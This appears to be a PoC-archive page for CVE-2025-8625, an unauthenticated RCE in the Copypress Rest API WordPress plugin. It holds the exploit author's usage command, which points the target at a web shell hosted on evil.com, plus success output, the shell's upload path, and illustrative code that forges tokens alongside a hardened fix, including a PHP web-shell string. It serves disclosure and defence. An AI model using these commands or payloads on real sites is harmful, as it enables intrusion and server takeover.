Related vulnerability
Title: WordPress plugin Copypress Rest API security vulnerability (CVE-2025-8625)
Description: WordPress and WordPress plugin are products of the WordPress Foundation. WordPress is a blogging platform written in PHP that lets users host a personal blog on a PHP and MySQL server; a WordPress plugin is an add-on for that platform. The Copypress Rest API plugin, versions 1.1 through 1.2, contains a security vulnerability: it uses a hard-coded JWT signing key and does not restrict the file types it fetches and saves, which can lead to remote code execution.
Description
Copypress Rest API 1.1 - 1.2 - Missing Configurable JWT Secret and File-Type Validation to Unauthenticated Remote Code Execution
Introduction
# CVE-2025-8625
Copypress Rest API 1.1 - 1.2 - Missing Configurable JWT Secret and File-Type Validation to Unauthenticated Remote Code Execution
# 🛡️ Copypress Rest API 1.1 - 1.2 RCE Exploit
## 📝 Description
The Copypress Rest API plugin for WordPress (versions 1.1 through 1.2) is vulnerable to **Remote Code Execution** via the `copyreap_handle_image()` function.
When no JWT secret has been configured, the plugin falls back to a hard-coded signing key, and the image handler does not validate the type of file it fetches. An unauthenticated attacker who knows the fallback key can forge a valid token and use the image handler endpoint to make the site fetch and store an arbitrary file, such as a PHP web shell.
- **CVE:** CVE-2025-8625
- **CVSS:** 9.8 (Critical)
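The two weaknesses described above (a shared fallback JWT key and no file-type check on the fetched file), as an added example; this is not code from the original page, from the plugin, or from the exploit author. It implements a minimal HS256 JWT signer and verifier with the standard library: `verify_vulnerable()` mirrors the bug by falling back to a hard-coded key when the site has configured none, so anyone who knows that key forges a token the same way the exploit script does, while `verify_hardened()` refuses to authenticate until a per-site secret exists. `is_safe_image_upload()` is the check the image handler is missing: an extension allow-list, rejection of PHP double extensions, and a magic-byte check that the bytes really are the image the extension claims. `DEFAULT_SECRET`, the claims, the sample file bytes and every function name are assumptions for illustration; the plugin's real key, claims and endpoint are not reproduced here.

```python
import base64
import hashlib
import hmac
import json
import os
import time
from typing import Optional

# Placeholder standing in for a hard-coded fallback key (assumed value, not the
# plugin's real key). What matters is that it is identical on every install and
# readable by anyone who has the plugin source.
DEFAULT_SECRET = "placeholder-hardcoded-secret"


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def sign_hs256(claims: dict, secret: str) -> str:
    """Produce a compact HS256 JWT; this is all an attacker with the fallback key needs."""
    header = _b64url(json.dumps({"typ": "JWT", "alg": "HS256"}, separators=(",", ":")).encode())
    payload = _b64url(json.dumps(claims, separators=(",", ":")).encode())
    signing_input = f"{header}.{payload}".encode("ascii")
    sig = hmac.new(secret.encode(), signing_input, hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url(sig)}"


def _verify_hs256(token: str, secret: str) -> Optional[dict]:
    """Return the claims if the signature is valid under `secret`, otherwise None."""
    try:
        h, p, s = token.split(".")
        header = json.loads(_b64url_decode(h))
        if not isinstance(header, dict) or header.get("alg") != "HS256":
            return None  # no "none" / algorithm confusion
        expected = hmac.new(secret.encode(), f"{h}.{p}".encode("ascii"), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, _b64url_decode(s)):
            return None
        claims = json.loads(_b64url_decode(p))
    except ValueError:  # malformed base64 / JSON / wrong segment count
        return None
    if not isinstance(claims, dict):
        return None
    exp = claims.get("exp")
    if exp is not None and (not isinstance(exp, (int, float)) or exp < time.time()):
        return None
    return claims


def verify_vulnerable(token: str, configured_secret: Optional[str]) -> Optional[dict]:
    """Bug pattern: silently fall back to the shared hard-coded key when the site set none."""
    return _verify_hs256(token, configured_secret or DEFAULT_SECRET)


def verify_hardened(token: str, configured_secret: Optional[str]) -> Optional[dict]:
    """Fix: no per-site secret means no authentication at all; never use the shared key."""
    if not configured_secret or configured_secret == DEFAULT_SECRET or len(configured_secret) < 32:
        return None
    return _verify_hs256(token, configured_secret)


# File-type validation the image handler should perform before writing to wp-content/uploads.
ALLOWED_IMAGE_EXT = {"jpg", "jpeg", "png", "gif", "webp"}
EXECUTABLE_EXT = {"php", "php5", "php7", "phtml", "phar"}


def _sniff_image(content: bytes) -> Optional[str]:
    """Identify the image format from magic bytes; None if the bytes are not an image."""
    if content.startswith(b"\xff\xd8\xff"):
        return "jpg"
    if content.startswith(b"\x89PNG\r\n\x1a\n"):
        return "png"
    if content[:6] in (b"GIF87a", b"GIF89a"):
        return "gif"
    if content[:4] == b"RIFF" and content[8:12] == b"WEBP":
        return "webp"
    return None


def is_safe_image_upload(filename: str, content: bytes) -> bool:
    """Accept only an allow-listed image extension whose bytes really are that image."""
    parts = os.path.basename(filename).lower().split(".")
    if len(parts) < 2:
        return False
    ext = parts[-1]
    # Rejects shell.php and also shell.php.png (double extensions some servers still execute).
    if ext not in ALLOWED_IMAGE_EXT or any(p in EXECUTABLE_EXT for p in parts[1:]):
        return False
    kind = _sniff_image(content)
    if kind is None:
        return False
    return kind == ext or (kind == "jpg" and ext == "jpeg")


if __name__ == "__main__":
    # Constructed scenario: the site never configured a secret and the attacker knows the fallback key.
    forged = sign_hs256({"sub": "attacker"}, DEFAULT_SECRET)
    print("vulnerable verifier accepts forged token:", verify_vulnerable(forged, None) is not None)
    print("hardened verifier accepts forged token:", verify_hardened(forged, None) is not None)
    shell = b"<?php system($_GET['c']); ?>"  # constructed sample payload
    print("shell.php accepted:", is_safe_image_upload("shell.php", shell))
    print("shell.png with PHP bytes accepted:", is_safe_image_upload("shell.png", shell))
    print("real PNG accepted:", is_safe_image_upload("photo.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16))
```

The hardened verifier fails closed: a missing or default secret yields no authenticated request rather than a request authenticated under a key every other install shares. The upload check looks at both the name and the bytes, because either check alone is bypassable (a PHP file renamed `.png`, or a real image named `x.php.png`).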
---
## 🚀 Script Overview
**Script name:** `CVE-2025-8625.py`
This Python script automates exploitation: it generates a JWT signed with the fallback key, sends a crafted request to the image handler, and points it at a malicious file (web shell) for the vulnerable WordPress site to fetch and save.
---
## ⚙️ Usage
```bash
python CVE-2025-8625.py -u https://target.com -shell https://evil.com/shell.php
```
- `-u` / `--url`: Target WordPress site URL
- `-shell` / `--shell`: Direct link to your web shell or other malicious PHP file; the target site fetches it from this URL, so it must be reachable from the target
**Example output:**
```
JWT: eyJ0eXAiOiJKV1QiLCJhbGciOi...
HTTP 201: {"created":true,"id":123,"message":"Success"}
Exploit success! Check your shell upload.
```
---
## 🏆 Features
- Generates a valid JWT using the plugin's hardcoded secret
- Bypasses authentication to upload arbitrary files
- Provides clear output for success/failure of exploitation
- Simple command-line interface
---
## 📂 Shell Upload Location
When the upload succeeds, the fetched file is stored under the WordPress uploads directory, following its year/month layout. Example path:
```
https://target.com/wp-content/uploads/2025/10/shell.php
```
---
## ⚠️ Disclaimer
This tool is for **educational and authorized penetration testing** purposes only.
Usage against targets without explicit permission is illegal.
---
***By: Nxploited (Khaled Alenazi)***
File snapshot
[4.0K] /data/pocs/48cd20fbf40e540570ec43376a45aaadb8d8f563
├── [2.6K] CVE-2025-8625.py
├── [1.5K] LICENSE
├── [1.9K] README.md
└── [ 17] requirements.txt
0 directories, 4 files
Notes
1. Prefer accessing the POC through its original source.
2. If the source is gone or unreachable, email f.jinxu#gmail.com (replace # with @) to request the local snapshot.
3. Shenlong has taken a snapshot of this POC code for you; to support long-term maintenance, please consider paying for the local POC copy. Thank you for your support.